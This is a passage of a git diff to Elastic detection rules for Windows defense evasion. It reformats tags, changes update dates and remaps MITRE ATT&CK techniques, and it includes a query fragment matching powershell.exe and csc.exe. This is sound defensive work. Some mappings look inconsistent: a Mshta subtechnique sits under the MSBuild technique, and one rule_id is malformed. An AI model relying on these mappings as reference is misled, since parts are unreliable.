+88,32 @@ process.name:("csc.exe" or "iexplore.exe" or "powershell.exe") [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" - [[rule.threat.technique.subtechnique]] id = "T1027.004" name = "Compile After Delivery" reference = "https://attack.mitre.org/techniques/T1027/004/" + [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" - [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [rule.new_terms] field = "new_terms_fields" value = ["host.id"] diff --git a/rules/windows/defense_evasion_execution_suspicious_explorer_winword.toml b/rules/windows/defense_evasion_execution_suspicious_explorer_winword.toml index d817fd8d7cf..4b5e879dc86 100644 --- a/rules/windows/defense_evasion_execution_suspicious_explorer_winword.toml +++ b/rules/windows/defense_evasion_execution_suspicious_explorer_winword.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/03" integration = ["endpoint", "windows", "m365_defender", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/11" [rule] author = ["Elastic"] @@ -62,7 +62,20 @@ DLL side-loading exploits the DLL search order to load malicious code into trust risk_score = 47 rule_id = "1160dcdb-0a0a-4a79-91d8-9b84616edebd" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Resources: Investigation Guide", "Data Source: Crowdstrike", "Data Source: SentinelOne"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Resources: Investigation Guide", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", +] timestamp_override = "event.ingested" type = "eql" @@ -110,18 +123,24 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" - [[rule.threat.technique.subtechnique]] id = "T1574.001" name = "DLL" reference = "https://attack.mitre.org/techniques/T1574/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_execution_windefend_unusual_path.toml b/rules/windows/defense_evasion_execution_windefend_unusual_path.toml index 98338405475..e1eaae3f8de 100644 --- a/rules/windows/defense_evasion_execution_windefend_unusual_path.toml +++ b/rules/windows/defense_evasion_execution_windefend_unusual_path.toml @@ -2,7 +2,7 @@ creation_date = "2021/07/07" integration = ["endpoint", "windows", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/11" [rule] author = ["Elastic", "Dennis Perto"] @@ -63,7 +63,19 @@ references = [ risk_score = 73 rule_id = "053a0387-f3b5-4ba5-8245-8002cca2bd08" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -94,23 +106,19 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" - +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" [[rule.threat.technique.subtechnique]] -id = "T1036.003" -name = "Rename Legitimate Utilities" -reference = "https://attack.mitre.org/techniques/T1036/003/" +id = "T1574.001" +name = "DLL" +reference = "https://attack.mitre.org/techniques/T1574/001/" + -[[rule.threat.technique.subtechnique]] -id = "T1036.005" -name = "Match Legitimate Resource Name or Location" -reference = "https://attack.mitre.org/techniques/T1036/005/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_file_creation_mult_extension.toml b/rules/windows/defense_evasion_file_creation_mult_extension.toml index d0b71e826a1..8725775f18e 100644 --- a/rules/windows/defense_evasion_file_creation_mult_extension.toml +++ b/rules/windows/defense_evasion_file_creation_mult_extension.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/19" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -98,18 +98,36 @@ file where host.os.type == "windows" and event.type == "creation" and file.exten [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" - [[rule.threat.technique.subtechnique]] id = "T1036.007" name = "Double File Extension" reference = "https://attack.mitre.org/techniques/T1036/007/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/defense_evasion_hide_encoded_executable_registry.toml b/rules/windows/defense_evasion_hide_encoded_executable_registry.toml index b546108d92b..628a39d0949 100644 --- a/rules/windows/defense_evasion_hide_encoded_executable_registry.toml +++ b/rules/windows/defense_evasion_hide_encoded_executable_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/25" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/19" [rule] author = ["Elastic"] @@ -85,18 +85,19 @@ registry where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1027" -name = "Obfuscated Files or Information" -reference = "https://attack.mitre.org/techniques/T1027/" - [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_iis_httplogging_disabled.toml b/rules/windows/defense_evasion_iis_httplogging_disabled.toml index 9a117a755ba..1f7de5422de 100644 --- a/rules/windows/defense_evasion_iis_httplogging_disabled.toml +++ b/rules/windows/defense_evasion_iis_httplogging_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/14" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/11" [rule] author = ["Elastic"] @@ -89,13 +89,19 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.002" +name = "Disable Windows Event Logging" +reference = "https://attack.mitre.org/techniques/T1562/002/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_indirect_exec_conhost.toml b/rules/windows/defense_evasion_indirect_exec_conhost.toml index 9b8ba6a9f67..12330d28d1f 100644 --- a/rules/windows/defense_evasion_indirect_exec_conhost.toml +++ b/rules/windows/defense_evasion_indirect_exec_conhost.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/21" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/21" [rule] author = ["Elastic"] @@ -80,13 +80,14 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" +id = "T1202" +name = "Indirect Command Execution" +reference = "https://attack.mitre.org/techniques/T1202/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_injection_msbuild.toml b/rules/windows/defense_evasion_injection_msbuild.toml index 593490f1528..742f00543cf 100755 --- a/rules/windows/defense_evasion_injection_msbuild.toml +++ b/rules/windows/defense_evasion_injection_msbuild.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -76,26 +76,36 @@ process where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" +[[rule.threat.technique]] +id = "T1127" +name = "Trusted Developer Utilities Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1127/" +[[rule.threat.technique.subtechnique]] +id = "T1127.001" +name = "MSBuild" +reference = "https://attack.mitre.org/techniques/T1127/001/" + + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/defense_evasion_lolbas_win_cdb_utility.toml b/rules/windows/defense_evasion_lolbas_win_cdb_utility.toml index f7f2e8233a2..bc19ee7efbd 100644 --- a/rules/windows/defense_evasion_lolbas_win_cdb_utility.toml +++ b/rules/windows/defense_evasion_lolbas_win_cdb_utility.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/24" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/28" [rule] author = ["Elastic"] @@ -95,13 +95,14 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1127" -name = "Trusted Developer Utilities Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1127/" +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_lsass_ppl_disabled_registry.toml b/rules/windows/defense_evasion_lsass_ppl_disabled_registry.toml index 0801bc6399a..6f434c174de 100644 --- a/rules/windows/defense_evasion_lsass_ppl_disabled_registry.toml +++ b/rules/windows/defense_evasion_lsass_ppl_disabled_registry.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/27" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/23" [rule] author = ["Elastic"] @@ -92,7 +92,6 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1112" name = "Modify Registry" @@ -102,6 +101,12 @@ reference = "https://attack.mitre.org/techniques/T1112/" id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + + [rule.threat.tactic] id = "TA0005" diff --git a/rules/windows/defense_evasion_masquerading_as_elastic_endpoint_process.toml b/rules/windows/defense_evasion_masquerading_as_elastic_endpoint_process.toml index bd9fa5b3fc7..47bf071a3c6 100644 --- a/rules/windows/defense_evasion_masquerading_as_elastic_endpoint_process.toml +++ b/rules/windows/defense_evasion_masquerading_as_elastic_endpoint_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/24" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] @@ -111,18 +111,19 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" - +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" [[rule.threat.technique.subtechnique]] -id = "T1055.012" -name = "Process Hollowing" -reference = "https://attack.mitre.org/techniques/T1055/012/" +id = "T1036.005" +name = "Match Legitimate Resource Name or Location" +reference = "https://attack.mitre.org/techniques/T1036/005/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_masquerading_business_apps_installer.toml b/rules/windows/defense_evasion_masquerading_business_apps_installer.toml index 0a25a153287..6b6d840dfd7 100644 --- a/rules/windows/defense_evasion_masquerading_business_apps_installer.toml +++ b/rules/windows/defense_evasion_masquerading_business_apps_installer.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/01" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -22,7 +22,17 @@ references = [ risk_score = 21 rule_id = "feafdc51-c575-4ed2-89dd-8e20badc2d6c" severity = "low" -tags = ["Domain: Endpoint", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "OS: Windows", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Initial Access", + "Tactic: Execution", + "Resources: Investigation Guide" +] timestamp_override = "event.ingested" type = "eql" @@ -199,36 +209,53 @@ Business applications are integral to productivity, often downloaded and install [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique.subtechnique]] +id = "T1036.001" +name = "Invalid Code Signature" +reference = "https://attack.mitre.org/techniques/T1036/001/" [[rule.threat.technique.subtechnique]] id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1189" +name = "Drive-by Compromise" +reference = "https://attack.mitre.org/techniques/T1189/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1204" name = "User Execution" reference = "https://attack.mitre.org/techniques/T1204/" - [[rule.threat.technique.subtechnique]] id = "T1204.002" name = "Malicious File" reference = "https://attack.mitre.org/techniques/T1204/002/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/defense_evasion_masquerading_communication_apps.toml b/rules/windows/defense_evasion_masquerading_communication_apps.toml index 49a0ebbad28..e280b7fae10 100644 --- a/rules/windows/defense_evasion_masquerading_communication_apps.toml +++ b/rules/windows/defense_evasion_masquerading_communication_apps.toml @@ -2,7 +2,7 @@ creation_date = "2023/05/05" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -138,12 +138,10 @@ Communication apps are integral to modern workflows, facilitating seamless inter [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" - [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" @@ -154,7 +152,22 @@ id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1554" +name = "Compromise Host Software Binary" +reference = "https://attack.mitre.org/techniques/T1554/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml b/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml index 3637fb30676..f7808e814e3 100644 --- a/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml +++ b/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/24" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -66,7 +66,20 @@ references = [ risk_score = 47 rule_id = "ac5012b8-8da8-440b-aaaf-aedafdea2dff" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -84,36 +97,48 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.012" name = "Image File Execution Options Injection" reference = "https://attack.mitre.org/techniques/T1546/012/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.012" name = "Image File Execution Options Injection" reference = "https://attack.mitre.org/techniques/T1546/012/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/defense_evasion_microsoft_defender_tampering.toml b/rules/windows/defense_evasion_microsoft_defender_tampering.toml index b79e6aecbf5..2b7315a7978 100644 --- a/rules/windows/defense_evasion_microsoft_defender_tampering.toml +++ b/rules/windows/defense_evasion_microsoft_defender_tampering.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/18" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Austin Songer"] @@ -140,7 +140,6 @@ registry where host.os.type == "windows" and event.type == "change" and process. [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1112" name = "Modify Registry" @@ -151,12 +150,9 @@ id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_modify_ownership_os_files.toml b/rules/windows/defense_evasion_modify_ownership_os_files.toml index 614c46dd467..21d79ba0ec9 100644 --- a/rules/windows/defense_evasion_modify_ownership_os_files.toml +++ b/rules/windows/defense_evasion_modify_ownership_os_files.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/01" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/02" [rule] @@ -58,7 +58,21 @@ Adversaries may modify file or directory ownership to evade access control lists risk_score = 47 rule_id = "7eb54028-ca72-4eb7-8185-b6864572347db" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", +] timeline_id = "e70679c2-6cde-4510-9764-4823df18f7db" timeline_title = "Comprehensive Process Timeline" timestamp_override = "event.ingested" @@ -77,18 +91,21 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1222" name = "File and Directory Permissions Modification" reference = "https://attack.mitre.org/techniques/T1222/" - [[rule.threat.technique.subtechnique]] id = "T1222.001" name = "Windows File and Directory Permissions Modification" reference = "https://attack.mitre.org/techniques/T1222/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + + + diff --git a/rules/windows/defense_evasion_ms_office_suspicious_regmod.toml b/rules/windows/defense_evasion_ms_office_suspicious_regmod.toml index 4bb3d2cf781..aee207a0bb1 100644 --- a/rules/windows/defense_evasion_ms_office_suspicious_regmod.toml +++ b/rules/windows/defense_evasion_ms_office_suspicious_regmod.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/12" integration = ["windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -103,23 +103,31 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" - -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/defense_evasion_msiexec_remote_payload.toml b/rules/windows/defense_evasion_msiexec_remote_payload.toml index b5e88f594ac..ba656ec2c14 100644 --- a/rules/windows/defense_evasion_msiexec_remote_payload.toml +++ b/rules/windows/defense_evasion_msiexec_remote_payload.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/19" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/19" [rule] author = ["Elastic"] @@ -62,7 +62,20 @@ MsiExec is a Windows utility for installing, maintaining, and removing software. risk_score = 73 rule_id = "c9847fe9-3bed-4e6b-b319-f9956d6dd02a" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -79,31 +92,19 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [[rule.threat.technique.subtechnique]] id = "T1218.007" name = "Msiexec" reference = "https://attack.mitre.org/techniques/T1218/007/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_network_connection_from_windows_binary.toml b/rules/windows/defense_evasion_network_connection_from_windows_binary.toml index e8f3559b58b..1d239873113 100644 --- a/rules/windows/defense_evasion_network_connection_from_windows_binary.toml +++ b/rules/windows/defense_evasion_network_connection_from_windows_binary.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/01" [transform] [[transform.osquery]] @@ -166,63 +166,34 @@ sequence by process.entity_id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique.subtechnique]] +id = "T1036.005" +name = "Match Legitimate Resource Name or Location" +reference = "https://attack.mitre.org/techniques/T1036/005/" + [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" - [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.002" -name = "Control Panel" -reference = "https://attack.mitre.org/techniques/T1218/002/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.003" -name = "CMSTP" -reference = "https://attack.mitre.org/techniques/T1218/003/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.004" -name = "InstallUtil" -reference = "https://attack.mitre.org/techniques/T1218/004/" - [[rule.threat.technique.subtechnique]] id = "T1218.005" name = "Mshta" reference = "https://attack.mitre.org/techniques/T1218/005/" -[[rule.threat.technique.subtechnique]] -id = "T1218.007" -name = "Msiexec" -reference = "https://attack.mitre.org/techniques/T1218/007/" -[[rule.threat.technique.subtechnique]] -id = "T1218.008" -name = "Odbcconf" -reference = "https://attack.mitre.org/techniques/T1218/008/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.010" -name = "Regsvr32" -reference = "https://attack.mitre.org/techniques/T1218/010/" - -[[rule.threat.technique]] -id = "T1220" -name = "XSL Script Processing" -reference = "https://attack.mitre.org/techniques/T1220/" [rule.threat.tactic] id = "TA0005" name 